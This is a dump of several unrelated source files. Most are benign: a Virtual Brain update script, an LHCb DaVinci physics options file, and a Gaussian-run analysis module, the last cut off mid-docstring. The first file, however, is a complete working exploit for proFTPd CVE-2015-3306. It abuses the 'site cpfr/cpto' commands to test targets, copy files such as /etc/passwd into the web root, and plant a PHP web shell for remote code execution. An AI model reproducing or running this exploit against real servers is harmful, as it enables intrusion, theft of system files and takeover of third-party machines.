#!/usr/bin/env python import sys import optparse import socket import random class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' if sys.platform == 'win32': HEADER = '' OKBLUE = '' OKGREEN = '' WARNING = '' FAIL = '' ENDC = '' BOLD = '' UNDERLINE = '' def caution( msg ): print bcolors.BOLD + bcolors.WARNING + "[" + bcolors.ENDC + "!" + bcolors.WARNING + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def good( msg ): print bcolors.BOLD + bcolors.OKGREEN + "[" + bcolors.ENDC + "+" + bcolors.OKGREEN + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def status( msg ): print bcolors.BOLD + bcolors.OKBLUE + "[" + bcolors.ENDC + "*" + bcolors.OKBLUE + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def error( msg ): print bcolors.BOLD + bcolors.FAIL + "[" + bcolors.ENDC + "-" + bcolors.FAIL + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def banner(): title = "proFTPd Arbitrary File Read Write w/ Possible Code Execution (CVE-2015-3306)" author = "Author: nootropics (root@ropcha.in)" ch=' ' length=80 spaced_title = ' %s ' % title spaced_author = ' %s ' % author print "\n" + bcolors.WARNING + spaced_title.center(length, ch) print spaced_author.center(length, ch) + "\n\n" + bcolors.ENDC def clear(): if os.name == 'nt' or sys.platform.startswith('win'): os.system('cls') else: os.system('clear') def main(): parser = optparse.OptionParser(banner(), version="%prog") parser.add_option("-t", "--target", dest="target", default="localhost", type="string", help="Target IP") parser.add_option("-p", "--port", dest="port", default=21, type="int", help="Target Port") parser.add_option("-f", "--file", dest="file", default="/etc/passwd", type="string", help="File to grab") parser.add_option("-m", "--mode", dest="chosenmode", default="1", type="string", help="Option to use 1: Test, 2: Grab File, 3: Code Exec") parser.add_option("-w", "--webdir", dest="webdir", default="/var/www/", type="string", help="Directory where the webserver gets files from (/var/www/)") (options, args) = parser.parse_args() try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(( options.target, options.port )) except Exception: quit(error("Cannot connect to %s:%s" % (options.target, options.port))) status("Connected to %s:%s" % (options.target, options.port)) if options.chosenmode == "1": s.send("site cpfr /etc/passwd\n") if "350" in s.recv(1024): good("Target is vulnerable!") else: error("Target doesn't appear to be vulnerable!") if options.chosenmode == "2": resultpath = options.webdir + ''.join(random.choice('0123456789ABCDEF') for i in range(16)) s.send("site cpfr %s" % options.file) if "350" in s.recv(1024): good("File exists! Copying now") else: error("File cannot be found or accessed") s.send("site cpto %s" % resultpath) if "250" in s.recv(1024): good("Copy sucessful! Check http://%s/%s for your file!" % (options.target, resultpath)) else: error("Access denied!") if options.chosenmode == "3": shellkey = ''.join(random.choice('0123456789ABCDEF') for i in range(16)) + ".php" s.send("site cpfr /etc/passwd") s.recv(1024) s.send("site cpto <?php @$_GET['x']($_GET['a']); ?>") s.recv(1024) s.send("site cpfr /proc/self/fd/3") s.recv(1024) s.send("site cpto %s%s" % (options.webdir, shellkey)) s.recv(1024) status("Browse to http://%s/%s to activate your payload!" % (options.target, shellkey)) if __name__ == "__main__": try: main() except KeyboardInterrupt: sys.exit(error("Closing!"))
nootropics/propane
propane.py
Python
mit
3,698
0.027853
# -*- coding: utf-8 -*- # # # TheVirtualBrain-Framework Package. This package holds all Data Management, and # Web-UI helpful to run brain-simulations. To use it, you also need do download # TheVirtualBrain-Scientific Package (for simulators). See content of the # documentation-folder for more details. See also http://www.thevirtualbrain.org # # (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest") # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2 as published by the Free # Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public # License for more details. You should have received a copy of the GNU General # Public License along with this program; if not, you can download it here # http://www.gnu.org/licenses/old-licenses/gpl-2.0 # # # CITATION: # When using The Virtual Brain for scientific publications, please cite it as follows: # # Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide, # Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013) # The Virtual Brain: a simulator of primate brain network dynamics. # Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010) # # """ .. moduleauthor:: Bogdan Neacsa <bogdan.neacsa@codemart.ro> """ from tvb.basic.logger.builder import get_logger from tvb.core.entities.storage import dao from tvb.core.services.event_handlers import handle_event LOGGER = get_logger(__name__) PAGE_SIZE = 20 EVENT_FILE_IDENTIFIER = "CodeVersionsManager.update.4750" def update(): """ Update TVB code to SVN revision version 4770. This update was done for release 1.0.5 """ projects_count = dao.get_all_projects(is_count=True) for page_start in range(0, projects_count, PAGE_SIZE): projects_page = dao.get_all_projects(page_start=page_start, page_end=min(page_start + PAGE_SIZE, projects_count)) for project in projects_page: try: handle_event(EVENT_FILE_IDENTIFIER, dao.get_system_user(), project) except Exception, excep: LOGGER.exception(excep)
stuart-knock/tvb-framework
tvb/core/code_versions/code_update_scripts/4750_update_code.py
Python
gpl-2.0
2,378
0.006728
from Gaudi.Configuration import * from Configurables import DaVinci #from Configurables import AlgTool from Configurables import GaudiSequencer MySequencer = GaudiSequencer('Sequence') #For 2012 MC DaVinci.DDDBtag='dddb-20130929-1' DaVinci.CondDBtag='sim-20130522-1-vc-md100' #for 2011 MC #DaVinci.DDDBtag='dddb-20130929' #DaVinci.CondDBtag='sim-20130522-vc-mu100' simulation=True ################################################################# #Rerun with stripping21 applied if simulation: from Configurables import EventNodeKiller from StrippingConf.Configuration import StrippingConf, StrippingStream from StrippingSettings.Utils import strippingConfiguration from StrippingArchive.Utils import buildStreams from StrippingArchive import strippingArchive event_node_killer=EventNodeKiller('StripKiller') event_node_killer.Nodes=['Event/AllStreams','/Event/Strip'] from Configurables import PhysConf PhysConf().CaloReProcessing=True stripping="stripping21" config=strippingConfiguration(stripping) archive=strippingArchive(stripping) streams=buildStreams(stripping=config,archive=archive) MyStream= StrippingStream("MyStream") MyLines= ["StrippingB2XEtaB2eta3piKstarLine"] for stream in streams: for line in stream.lines: if line.name() in MyLines: MyStream.appendLines( [ line ]) from Configurables import ProcStatusCheck filterBadEvents=ProcStatusCheck() sc=StrippingConf( Streams= [ MyStream ], MaxCandidates = 2000, AcceptBadEvents = False, BadEventSelection = filterBadEvents) DaVinci().appendToMainSequence([event_node_killer,sc.sequence()]) ##################Creating NTuples##################################### from Configurables import DecayTreeTuple from Configurables import TupleToolL0Calo from DecayTreeTuple.Configuration import * line = 'B2XEtaB2eta3piKstarLine' tuple=DecayTreeTuple() tuple.Decay="[B0 -> ^(K*(892)0 -> ^K+ ^pi-) ^(eta -> ^pi- ^pi+ ^(pi0 -> ^gamma ^gamma))]CC" tuple.Branches={"B0":"[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC"} tuple.Inputs=['/Event/Phys/{0}/Particles'.format(line)] tuple.addTool(TupleToolL0Calo()) tuple.TupleToolL0Calo.TriggerClusterLocation="/Event/Trig/L0/Calo" tuple.TupleToolL0Calo.WhichCalo="HCAL" tuple.ToolList += [ "TupleToolGeometry" , "TupleToolDira" , "TupleToolAngles" # , "TupleToolL0Calo" , "TupleToolPid" , "TupleToolKinematic" , "TupleToolPropertime" , "TupleToolPrimaries" , "TupleToolEventInfo" , "TupleToolTrackInfo" , "TupleToolVtxIsoln" , "TupleToolPhotonInfo" , "TupleToolMCBackgroundInfo" , "TupleToolCaloHypo" , "TupleToolTrackIsolation" , "TupleToolPi0Info" ] tuple.addTool(TupleToolDecay,name="B0") from Configurables import TupleToolDecayTreeFitter #========================================REFIT WITH DAUGHTERS AND PV CONSTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/ConsAll') tuple.B0.ConsAll.Verbose=True tuple.B0.ConsAll.constrainToOriginVertex=True tuple.B0.ConsAll.daughtersToConstrain = ["K*(892)0","eta"] #==============================REFIT WITH ETA, PI0 AND PV CONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpf') tuple.B0.PVFitpf.Verbose=True tuple.B0.PVFitpf.constrainToOriginVertex=True tuple.B0.PVFitpf.daughtersToConstrain = ["eta","pi0"] #==============================REFIT WITH ONLY ETA AND PV CONSTRAINED========================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFit') tuple.B0.PVFit.Verbose=True tuple.B0.PVFit.constrainToOriginVertex=True tuple.B0.PVFit.daughtersToConstrain = ["eta"] 
#==============================REFIT WITH ETA AND PV K for piCONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforpi') tuple.B0.PVFitKforpi.Verbose=True tuple.B0.PVFitKforpi.constrainToOriginVertex=True tuple.B0.PVFitKforpi.daughtersToConstrain = ["eta"] tuple.B0.PVFitKforpi.Substitutions={ "B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "pi+" , "B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "pi-" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ============== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforK') tuple.B0.PVFitpiminusforK.Verbose=True tuple.B0.PVFitpiminusforK.constrainToOriginVertex=True tuple.B0.PVFitpiminusforK.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminusforK.Substitutions={ "B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "K-" , "B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "K+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap ============= tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forK') tuple.B0.PVFitpiminus0forK.Verbose=True tuple.B0.PVFitpiminus0forK.constrainToOriginVertex=True tuple.B0.PVFitpiminus0forK.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminus0forK.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "K-" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "K+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforK') tuple.B0.PVFitpiplusforK.Verbose=True tuple.B0.PVFitpiplusforK.constrainToOriginVertex=True tuple.B0.PVFitpiplusforK.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiplusforK.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "K+" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "K-" , } #proton swaps #==============================REFIT WITH ETA AND PV K for proton CONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforproton') tuple.B0.PVFitKforproton.Verbose=True tuple.B0.PVFitKforproton.constrainToOriginVertex=True tuple.B0.PVFitKforproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitKforproton.Substitutions={ "B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p+" , "B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p~-" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ============== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforproton') tuple.B0.PVFitpiminusforproton.Verbose=True tuple.B0.PVFitpiminusforproton.constrainToOriginVertex=True tuple.B0.PVFitpiminusforproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminusforproton.Substitutions={ "B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p~-" , "B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap ============= tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forproton') tuple.B0.PVFitpiminus0forproton.Verbose=True tuple.B0.PVFitpiminus0forproton.constrainToOriginVertex=True tuple.B0.PVFitpiminus0forproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminus0forproton.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) 
(eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "p~-" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "p+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforproton') tuple.B0.PVFitpiplusforproton.Verbose=True tuple.B0.PVFitpiplusforproton.constrainToOriginVertex=True tuple.B0.PVFitpiplusforproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiplusforproton.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "p+" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "p~-" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitgammaforpi0') tuple.B0.PVFitgammaforpi0.Verbose=True tuple.B0.PVFitgammaforpi0.constrainToOriginVertex=True tuple.B0.PVFitgammaforpi0.daughtersToConstrain = ["eta"] tuple.B0.PVFitgammaforpi0.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> ^gamma gamma))" : "pi0" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ pi- (pi0 -> ^gamma gamma))" : "pi0" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitgamma0forpi0') tuple.B0.PVFitgamma0forpi0.Verbose=True tuple.B0.PVFitgamma0forpi0.constrainToOriginVertex=True tuple.B0.PVFitgamma0forpi0.daughtersToConstrain = ["eta"] tuple.B0.PVFitgamma0forpi0.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma ^gamma))" : "pi0" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ pi- (pi0 -> gamma ^gamma))" : "pi0" , } #==============================REFIT WITH ONLY K* CONSTRAINED=================================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/KStarOnly') tuple.B0.KStarOnly.Verbose=True tuple.B0.KStarOnly.constrainToOriginVertex=True tuple.B0.KStarOnly.daughtersToConstrain = ["K*(892)0"] #==============================REFIT WITH ONLY PV CONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVOnly') tuple.B0.PVOnly.Verbose=True tuple.B0.PVOnly.constrainToOriginVertex=True #========================================REFIT WITH JUST DAUGHTERS CONSTRAINED================================ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/Conskstar_eta') tuple.B0.Conskstar_eta.Verbose=True tuple.B0.Conskstar_eta.constrainToOriginVertex=False tuple.B0.Conskstar_eta.daughtersToConstrain = ["K*(892)0","eta"] #========================================REFIT WITH NOTHING CONSTRAINED======================================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/Consnothing') tuple.B0.Consnothing.Verbose=True tuple.B0.Consnothing.constrainToOriginVertex=False #========================================LOKI FUBNCTOR VARIABLES======================================== tuple.addBranches({'Kstar' : '[B0 -> ^(K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'eta' : '[B0 -> (K*(892)0 -> K+ pi-) ^(eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'Kplus' : '[B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'piminus' : '[B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC', 'piplus' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))]CC', 'piminus0' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))]CC', 'gamma' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> ^gamma gamma))]CC', 'gamma0' : '[B0 -> 
(K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma ^gamma))]CC', 'pi0' : '[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ ^(pi0 -> gamma gamma))]CC'}) from LoKiPhys.decorators import MAXTREE,MINTREE,ISBASIC,HASTRACK,SUMTREE,PT,ABSID,NINTREE,ETA,TRPCHI2 B0_hybrid=tuple.B0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_B0') Kstar_hybrid=tuple.Kstar.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_Kstar') eta_hybrid=tuple.eta.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_eta') Kplus_hybrid=tuple.Kplus.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_Kplus') piminus_hybrid=tuple.piminus.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_piminus') piplus_hybrid=tuple.piplus.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_piplus') piminus0_hybrid=tuple.piminus0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_piminus0') gamma_hybrid=tuple.gamma.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_gamma') gamma0_hybrid=tuple.gamma0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_gamma0') pi0_hybrid=tuple.pi0.addTupleTool('LoKi::Hybrid::TupleTool/LoKi_pi0') preamble=[ 'TRACK_MAX_PT= MAXTREE(PT, ISBASIC & HASTRACK, -666)', 'TRACK_MIN_PT= MINTREE(PT, ISBASIC & HASTRACK)', 'SUMTRACK_PT= SUMTREE((211 == ABSID)|(-211 == ABSID)|(321 == ABSID)|(-321 == ABSID),PT)', 'SUM_PCHI2= SUMTREE((211 == ABSID)|(-211 == ABSID)|(321 == ABSID)|(-321 == ABSID),TRPCHI2)' ] B0_hybrid.Preambulo=preamble B0_hybrid.Variables = { 'max_pt_track' : 'TRACK_MAX_PT', 'min_pt_track' : 'TRACK_MIN_PT', 'sum_track_pt' : 'SUMTRACK_PT', 'sum_pchi2' : 'SUM_PCHI2', 'n_highpt_tracks' : 'NINTREE(ISBASIC & HASTRACK & (PT>250.0*MeV))', 'eta' :'ETA' } Kstar_hybrid.Variables ={ 'branch_mass':'MM', 'eta': 'ETA' } eta_hybrid.Variables ={ 'branch_mass':'MM', 'eta': 'ETA' } Kplus_hybrid.Variables ={ 'eta': 'ETA' } piminus_hybrid.Variables ={ 'eta': 'ETA' } piplus_hybrid.Variables ={ 'eta': 'ETA' } piminus0_hybrid.Variables ={ 'eta': 'ETA' } gamma_hybrid.Variables = { 'eta':'ETA' } gamma0_hybrid.Variables = { 'eta':'ETA' } pi0_hybrid.Variables = { 'eta':'ETA' } #==============================MassSubs===================================== from Configurables import TupleToolSubMass tuple.B0.addTool(TupleToolSubMass) tuple.B0.ToolList += ["TupleToolSubMass"] tuple.B0.TupleToolSubMass.Substitution += ["pi- => K-"] tuple.B0.TupleToolSubMass.Substitution += ["K+ => pi+"] tuple.B0.TupleToolSubMass.Substitution += ["pi+ => K+"] tuple.B0.TupleToolSubMass.Substitution += ["pi+ => p+"] tuple.B0.TupleToolSubMass.Substitution += ["pi- => p~-"] tuple.B0.TupleToolSubMass.Substitution += ["K+ => p+"] tuple.B0.TupleToolSubMass.Substitution += ["gamma => pi0"] tuple.B0.TupleToolSubMass.Substitution += ["gamma => e-"] tuple.B0.TupleToolSubMass.Substitution += ["gamma => e+"] tuple.B0.TupleToolSubMass.Substitution += ["pi- => mu-"] tuple.B0.TupleToolSubMass.Substitution += ["pi+ => mu+"] tuple.B0.TupleToolSubMass.Substitution += ["pi0 => eta"] tuple.B0.TupleToolSubMass.DoubleSubstitution += ["K+/pi- => pi+/K-"] tuple.B0.TupleToolSubMass.DoubleSubstitution += ["pi+/pi- => pi-/pi+"] tuple.B0.TupleToolSubMass.DoubleSubstitution += ["pi+/pi- => mu+/mu-"] #==============================TRIGGER DECISIONS==============================- from Configurables import TupleToolTISTOS tistos=tuple.B0.addTupleTool(TupleToolTISTOS, name="TupleToolTISTOS") tistos.VerboseL0=True tistos.VerboseHlt1=True tistos.VerboseHlt2=True tistos.TriggerList=["L0PhotonDecision", "L0ElectronDecision", "Hlt1TrackPhotonDecision", "Hlt1TrackAllL0Decision", "Hlt1TrackMuonDecision", "Hlt1TrackForwardPassThroughDecision", 
"Hlt1TrackForwardPassThroughLooseDecision", "Hlt1SingleElectronNoIPDecision", "L0HadronDecision", "L0LocalPi0Decision", "L0GlobalPi0Decision", "L0MuonDecision", "Hlt2Topo2BodyBBDTDecision", "Hlt2Topo3BodyBBDTDecision", "Hlt2Topo4BodyBBDTDecision", "Hlt2RadiativeTopoTrackTOSDecision", "Hlt2RadiativeTopoPhotonL0Decision", "Hlt2TopoRad2BodyBBDTDecision", "Hlt2TopoRad2plus1BodyBBDTDecision", "Hlt2Topo2BodySimpleDecision", "Hlt2Topo3BodySimpleDecision", "Hlt2Topo4BodySimpleDecision"] from Configurables import TupleToolL0Calo tuple.Kplus.addTool(TupleToolL0Calo,name="KplusL0Calo") tuple.Kplus.ToolList += ["TupleToolL0Calo/KplusL0Calo"] tuple.Kplus.KplusL0Calo.WhichCalo="HCAL" tuple.piplus.addTool(TupleToolL0Calo,name="piplusL0Calo") tuple.piplus.ToolList += ["TupleToolL0Calo/piplusL0Calo"] tuple.piplus.piplusL0Calo.WhichCalo="HCAL" tuple.piminus.addTool(TupleToolL0Calo,name="piminusL0Calo") tuple.piminus.ToolList += ["TupleToolL0Calo/piminusL0Calo"] tuple.piminus.piminusL0Calo.WhichCalo="HCAL" tuple.piminus0.addTool(TupleToolL0Calo,name="piminus0L0Calo") tuple.piminus0.ToolList += ["TupleToolL0Calo/piminus0L0Calo"] tuple.piminus0.piminus0L0Calo.WhichCalo="HCAL" #================================CONFIGURE TUPLETOOLMCTRUTH======================================================== from Configurables import TupleToolMCTruth tuple.addTool(TupleToolMCTruth) tuple.ToolList += ["TupleToolMCTruth"] tuple.TupleToolMCTruth.ToolList += [ "MCTupleToolHierarchy", "MCTupleToolKinematic", # "MCTupleToolDecayType", # "MCTupleToolReconstructed", # "MCTupleToolPID", # "MCTupleToolP2VV", # "MCTupleToolAngles", # "MCTupleToolInteractions", # "MCTupleToolPrimaries", # "MCTupleToolPrompt" ] etuple=EventTuple() etuple.ToolList=["TupleToolEventInfo"] from Configurables import MCDecayTreeTuple mctuple=MCDecayTreeTuple("mctuple") mctuple.ToolList+=["MCTupleToolKinematic","MCTupleToolReconstructed","MCTupleToolHierarchy","MCTupleToolDecayType","MCTupleToolPID"] mctuple.Decay="[[B0]cc => ^(K*(892)0 => ^K+ ^pi-) ^(eta => ^pi- ^pi+ ^(pi0=> ^gamma ^gamma))]CC" MySequencer.Members.append(etuple) MySequencer.Members.append(tuple) MySequencer.Members.append(mctuple) DaVinci().InputType='DST' DaVinci().UserAlgorithms+=[MySequencer] DaVinci().TupleFile="Output.root" DaVinci().HistogramFile="histos.root" DaVinci().DataType='2012' DaVinci().EvtMax=-1 DaVinci().PrintFreq=1000 DaVinci().MoniSequence=[tuple] DaVinci().Simulation=simulation #from GaudiConf import IOHelper # Use the local input data #IOHelper().inputFiles([ # '00038851_00000006_2.AllStreams.dst' #], clear=True)
Williams224/davinci-scripts
ksteta3pi/NTupleMaker_MagDown.py
Python
mit
17,928
0.01863
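# A minimal sketch (not part of the original options file) of how local input
# data could be attached when running the NTupleMaker options above with
# gaudirun.py; it mirrors the IOHelper block left commented out at the end of
# the file. The DST file name is a placeholder taken from that comment, not a
# real sample.
from GaudiConf import IOHelper

IOHelper().inputFiles([
    '00038851_00000006_2.AllStreams.dst',  # placeholder local DST
], clear=True)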
# -*- coding: utf-8 -*- from itertools import product, imap import copy import math import string import multiprocessing import platform import numpy as np import pandas as pd from pandas.tools.plotting import radviz import matplotlib.pyplot as plt import matplotlib.cm as cm from matplotlib.colors import ColorConverter from sklearn.cluster import KMeans from IPython.core.display import clear_output from .molecule import Molecule from .utils import df_to_img from .file_io import Folder def unpack_and_make_molecule(val_dict): if val_dict.has_key('args'): args = val_dict.pop('args') else: args = [] return Molecule(*args, **val_dict) class Analysis(object): """a class to analyse multiple computations """ def __init__(self, folderpath='', server=None, username=None, passwrd=None, folder_obj=None, headers=[]): """a class to analyse multiple computations Parameters ---------- folderpath : str the folder directory storing the files to be analysed server : str the name of the server storing the files to be analysed username : str the username to connect to the server passwrd : str server password, if not present it will be asked for during initialisation headers : list the variable categories for each computation """ self._folder = None if folder_obj: self._folder = folder_obj elif folderpath or server: self.set_folder(folderpath, server, username, passwrd) heads = headers[:]+['Molecule'] self._df = pd.DataFrame(columns=heads) self._df.index.name = 'ID' self._next_index = 0 def __repr__(self): return self.get_table().to_string() def copy(self): clone = copy.deepcopy(self) return clone def get_folder(self): return self._folder def set_folder(self, folderpath='', server=None, username=None, passwrd=None): self._folder = Folder(folderpath, server, username, passwrd) folder = property(get_folder, set_folder, doc="The folder for gaussian runs") def count_runs(self): """ get number of runs held in analysis """ return len(self._df.index) def _add_molecule(self, molecule, identifiers): """add molecule to internal dataframe """ identifiers['Molecule'] = molecule series = pd.DataFrame(identifiers, index=[self._next_index]) self._df = self._df.copy().append(series) self._next_index += 1 return True def add_run(self, identifiers={}, init_fname=None, opt_fname=None, freq_fname=None, nbo_fname=None, alignto=[], atom_groups={}, add_if_error=False, folder_obj=None): """add single Gaussian run input/outputs """ if not folder_obj: folder_obj = self._folder molecule = Molecule(init_fname=init_fname, opt_fname=opt_fname, freq_fname=freq_fname, nbo_fname=nbo_fname, folder_obj=folder_obj, alignto=alignto, atom_groups=atom_groups, fail_silently=True) num_files = filter(lambda x:x, [init_fname, opt_fname, freq_fname, nbo_fname]) read_errors = molecule.get_init_read_errors() if len(read_errors) != num_files and (not read_errors or add_if_error): self._add_molecule(molecule, identifiers) return molecule.get_init_read_errors() def _get_molecules(self, mol_inputs, folder_obj, identifiers, ipython_print=False): """ get molecules """ if folder_obj.islocal() and not platform.system() == 'Windows': pool = multiprocessing.Pool(processes=multiprocessing.cpu_count()) mapping = pool.imap else: mapping = imap with folder_obj: molecules=[] all_read_errors = [] for molecule in mapping(unpack_and_make_molecule, mol_inputs): molecules.append(molecule) read_errors = [] for typ, fname, msg in molecule.get_init_read_errors(): idents = identifiers[len(molecules)-1].copy() idents.pop('Molecule', '_') idents['Type'] = typ idents['File'] = fname 
idents['Error_Message'] = msg read_errors.append(idents) all_read_errors.append(read_errors) if ipython_print: print 'Reading data {0} of {1}'.format(len(molecules), len(mol_inputs)) try: clear_output(wait=True) except: pass if folder_obj.islocal() and not platform.system() == 'Windows': pool.close() pool.join() return molecules, all_read_errors def add_runs(self, headers=[], values=[], init_pattern=None, opt_pattern=None, freq_pattern=None, nbo_pattern=None, add_if_error=False, alignto=[], atom_groups={}, ipython_print=False, folder_obj=None): """add multiple Gaussian run inputs/outputs """ # set folder oject if not folder_obj: folder_obj = self._folder #get variables for each run mol_inputs = [] identifiers = [] for idents in product(*values): mol_input = {} identifiers.append(dict(zip(headers, idents))) mol_input['init_fname'] = init_pattern.format(*idents) if init_pattern else None if type(opt_pattern) is str: mol_input['opt_fname'] = opt_pattern.format(*idents) if opt_pattern else None elif type(opt_pattern) is list or type(opt_pattern) is tuple: mol_input['opt_fname'] = [o.format(*idents) for o in opt_pattern] else: mol_input['opt_fname'] = None mol_input['freq_fname'] = freq_pattern.format(*idents) if freq_pattern else None mol_input['nbo_fname'] = nbo_pattern.format(*idents) if nbo_pattern else None mol_input['folder_obj'] = folder_obj mol_input['alignto'] = alignto mol_input['atom_groups'] = atom_groups mol_input['fail_silently'] = True mol_inputs.append(mol_input) #create the molecules molecules, read_errors = self._get_molecules(mol_inputs, folder_obj, identifiers, ipython_print) #add the molecules to the internal table for molecule, idents, inputs, read_error in zip(molecules, identifiers, mol_inputs, read_errors): num_files = filter(lambda x:x, [inputs['init_fname'], inputs['opt_fname'], inputs['freq_fname'], inputs['nbo_fname']]) if read_error != num_files and (not read_error or add_if_error): self._add_molecule(molecule, idents) #collate read errors into a dataframe to return read_errors = filter(len, read_errors) err_df = pd.DataFrame([item for sublist in read_errors for item in sublist]) if read_errors: cols = err_df.columns.tolist() #rearrange columns headers cols.remove('Type'); cols.append('Type') cols.remove('File'); cols.append('File') cols.remove('Error_Message'); cols.append('Error_Message') err_df = err_df[cols] return err_df def get_table(self, rows=[], columns=[], filters={}, precision=4, head=False, mol=False, row_index=[], column_index=[], as_image=False, na_rep='-', font_size=None, width=None, height=None, unconfined=False): """return pandas table of requested data in requested format Parameters ----------- rows : integer or list of integers select row ids columns : string/integer or list of strings/integers select column names/positions filters : dict filter for rows with certain value(s) in specific columns precision : int decimal precision of displayed values head : int return only first n rows mol : bool include column containing the molecule objects row_index : string or list of strings columns to use as new index column_index : list of strings srings to place in to higher order column indexs as_image : bool output the table as an image 